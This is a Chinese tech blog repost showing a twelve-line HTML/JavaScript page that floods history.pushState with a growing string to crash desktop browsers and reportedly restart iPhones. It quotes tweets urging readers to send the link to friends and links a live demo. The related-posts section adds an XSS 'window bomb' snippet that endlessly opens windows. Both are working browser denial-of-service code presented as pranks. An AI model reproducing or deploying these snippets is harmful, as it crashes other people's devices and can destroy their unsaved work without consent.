这十二行代码是如何让浏览器爆炸的?

最新推荐文章于 2022-02-18 00:54:24 发布
最新推荐文章于 2022-02-18 00:54:24 发布
阅读量530 收藏
点赞数
分类专栏: Web 文章标签: Javascript security 浏览器

起因

今天刷推特的时候发现 Cyber Security@cyber__sec 的推文让人眼前一亮:

Crash firefox, chrome, safari browsers, and also restart iphone using this javascript code. #dos #0day #exploit//使用下面这段 JavaScript 代码能让 firefox,chrome,safari 浏览器崩溃,而且还能让 iphone 重启。

继续在推特上深挖发现 IT Security Tweets ™ @F1r3h4nd 于 17 日发推:

Crash your friend’s browser and restart Iphone with a link which has this script: #0day

//把带有下面这个脚本的链接发给你的朋友,能让你朋友的浏览器崩溃,而且让 Iphone 重启。

完整 HTML 代码如下:

<html>
<body>
<script>
var total="";
for (var i=0;i<1000000;i++)
{
    total= total+i.toString ();
    history.pushState (0,0,total);
}
</script>
</body>
</html>

demo:(温馨提示:请保存浏览器其它窗口的编辑任务)

www.0xroot.cn/demo.html (点击一下,又不会怀孕!)

接来下会发生什么?

点开以后,我的状态是这样的:

如果你是 PC 端用户,点开链接以后,电脑 CPU 内存极有可能一路狂飙直至浏览器崩溃卡死!

如果你是移动端(安卓、iPhone)用户,点开链接以后你的浏览器会闪退!在微博、微信客户端点开链接同样会闪退。iPhone 用 Safari 打开之后链接之后,手机注销重启了!…

思考

这是 Bug 还是 0day?为什么会有这一现象?如何实现的?

转自:http://www.codeceo.com/article/12-line-code-browser-die.html

新民工涛哥
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
多hostname导致的 Timeout of 60000ms expired before the position for partition could be determined
weixin_40455124的博客
07-12 5600
flink kafka报错Timeout of 60000ms expired before the position for partition could be determined 一般认为和partition数量不匹配有关,但实际处理需要关注日志。 在flink exception 处有如下错误: org.apache.kafka.common.errors.TimeoutException: Timeout of 60000ms expired before the position for pa
无法阻挡的IE炸弹
ン月光の游乐园ヾ
02-16 1302
五一长假,在家无聊!想跟同学开开玩笑!想发给他一个恶作剧软件!但是一想到人家有杀毒软件!估计能被查杀!不知道的朋友还以为我发给他木马呢!到头来顶一个盗密码的罪名可不好!那只有自己做了!用VB写简单是简单!但是我这个人还是怕麻烦哈!在心里想惦记的还有没更简单的!想着想着!在zeta的小站上发现了一个“任何浏览器都可以弹广告的HTML代码”不会是吹的吧!我的2000可是打满补丁的!代码如下:for(i
xss完成浏览器视窗炸弹
qfslyy的博客
02-18 315
无聊,,,发个文章。 这个就是很简单的视窗炸弹,放在自己的 xss平台上,执行就会一直打开页面。初学者可以 试一试。 function WindowBomb() { var iCounter = 0 // dummy counter while (true) { window.open(“https://blog.csdn.net/qfslyy/article/details/111664006?spm=1001.2014.3001.5501”,“CRASHING” + iCounter,“width=10
Kafka-常见问题
迷路剑客个人博客
09-28 6743
Kafka-0.8.2.1常见问题 Consumer报错 问题描述: WARN [console-consumer-23149_hadoop2-1476872289945-6edaec5e-leader-finder-thread], Failed to add leader for partitions [filelog_v3_json_test_1019,13],....; will ...
flink kafka报错Timeout of 60000ms expired before the position for partition could be determined
热门推荐
I'm a 软件工程师
06-09 2万+
这里写自定义目录标题错误:原因修改方法 错误: org.apache.kafka.common.errors.TimeoutException: Timeout of 60000ms expired before the position for partition skynetdbus-flink-test-1 could be determined 原因 kafka 该topic 的partition数量大于flink TaskManager中可用的slot数量 修改方法 增加Flink slot数或
2023跨年烟花代码爆炸效果好,带背景音乐
12-14
这篇教程将介绍如何创建一个2023跨年烟花代码爆炸效果,同时带有背景音乐的互动网页。这个项目结合了HTMLJavaScript以及可能的CSS技术,为庆祝新年提供了一个充满喜庆氛围的数字体验。 首先,我们要理解HTML是...
爱心代码+烟花代码,下载可直接浏览器绽放!
01-20
本资源提供的是一个“爱心代码”和“烟花代码”的压缩包,旨在让即使是编程新手也能在浏览器中轻松实现视觉效果。 爱心代码通常是指利用HTML和CSS来绘制形状,特别是心形图案。HTML可以用于结构化内容,而CSS则用于...
HTML5 canvas星球爆炸动画代码.zip
05-14
在这个“HTML5 canvas星球爆炸动画代码”中,我们将深入探讨如何利用canvas来创建一个动态的、视觉震撼的星球爆炸效果。 首先,我们需要了解HTML5 canvas的基本用法。HTML代码中,canvas通过`<canvas>`标签插入,...
超酷的jQuery鼠标滑过爆炸特效特效代码
03-20
通过使用jQuery,开发者可以编写更简洁、更易读的代码,同时避免跨浏览器的兼容性问题。 这个特效的核心在于jQuery的事件监听和CSS3的过渡与动画效果。当鼠标滑过元素时,jQuery的`mouseover`或`mouseenter`事件会...
HTML5视频播放点击爆炸效果特效代码
03-20
此外,"使用帮助.txt"可能是包含如何引入和使用这段特效代码的说明文档,而"谷普下载.url"和"说明.url"可能是链接到更多资源或详细教程的快捷方式。"jiaoben4960"看起来像是一个JavaScript文件或者包含了特效代码的...
Timeout of 60000ms expired before the position for partition could be determined踩坑flink消费kafka2.3.0
RUIMENG061511332的博客
07-04 8514
flink消费kafka2.3.0,时报错,分区分配的不对 Kafka Client Timeout of 60000ms expired before the position for partition could be determined 在网上找了一波,没找到原因,后面,误打误撞,发现,是因为,kafka的配置文件,server.properties,使用了主机名作为配置,在server.properties中添加 host.name=192.168.0.30 (当前所在服务器的i.
ERROR 220624 --- [ntainer#2-2-C-1] o.s.k.l.KafkaMessageListenerContainer : Failed to set initial
SDAUguo的博客
12-03 2988
完整报错: org.apache.kafka.common.errors.TimeoutException: Timeout of 60000ms expired before the position for partition heartbeatMessage1-2 could be determined 2021-12-03 16:17:44.253 ERROR 220624 --- [ntainer#2-1-C-1] o.s.k.l.KafkaMessageListenerContainer
ETL之kettle
I'm a 软件工程师
08-19 193
kettle下载地址: https://community.hitachivantara.com/s/article/data-integration-kettle kettle版本与jdk版本对应关系: https://blog.csdn.net/qq724581322/article/details/82533987
十二行代码浏览器爆炸
01-22 440
<html> <body> <script> var total=""; for (var i=0;i<1000000;i++) { total= total+i.toString (); history.pushState (0,0,total); } </script> </body> </html>
作死的神秘12行代码:分分钟让你电脑崩溃手机重启
X-rapido的专栏
07-13 1万+
最近,一段神秘的12行代码在国外社交网络上火了起来,据说能让你的浏览器瞬间崩溃,iPhone秒重启。到底是什么代码这么神奇?国外网友Cyber Security@cyber__sec在Twitter上发布了这样一段推文:“使用下面这段javascript代码,能让Firefox、Chrome、Safari浏览器崩溃,还能让iPhone重启”。事实上,更早的时候,IT Security Tweets
kafka异常问题汇总
与优秀的人在一起,会使自己变得更优秀
08-27 1万+
1、报错:: java.util.concurrent.ExecutionException: org.apache.kafka.common.errors.NotLeaderForPartitionException: This server is not the leader for that topic-partition.  报错原因:producer在向kafka broker...
可以让浏览器崩溃的12行代码
wackycrazy的专栏
01-21 6797
起因 今天刷推特的时候发现Cyber Security@cyber__sec的推文让人眼前一亮: Crash firefox, chrome, safari browsers, and also restart iphone using this javascript code. #dos #0day #exploit //使用下面这段JavaScript代码能让firefox,chrome,
[case49]聊聊flink的checkpoint配置
weixin_34059951的博客
12-09 187
序 本文主要研究下flink的checkpoint配置 实例 StreamExecutionEnvironment env = StreamExecutionEnvironment.getExecutionEnvironment(); // start a checkpoint every 1000 ms env.enableCheck...
【Flink】Flink exactly-once 报错 Timeout expired after 60000 milliseconds while awaiting InitProducerId
九师兄
08-17 2536
1.概述 flink 开启了exactly-once,设置了transaction.id 然后flink一直不停重启,一直报错 org.apache.kafka.common.errors.TimeoutException: org.apache.kafka.common.errors.TimeoutException: Timeout expired after 60000milliseconds while awaiting InitProducerId 界面还有如下的debug问题 taskMana
threejs glb爆炸
最新发布
06-26
4. 在three.js的文档、社区或Github上寻求帮助和资源,查阅相关的文档和示例代码 总之,针对three.js GLB模型爆炸问题,要善于运用各种工具和技能进行调试和解决,同时也要注重设计和优化模型以提高其可靠性和稳定...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值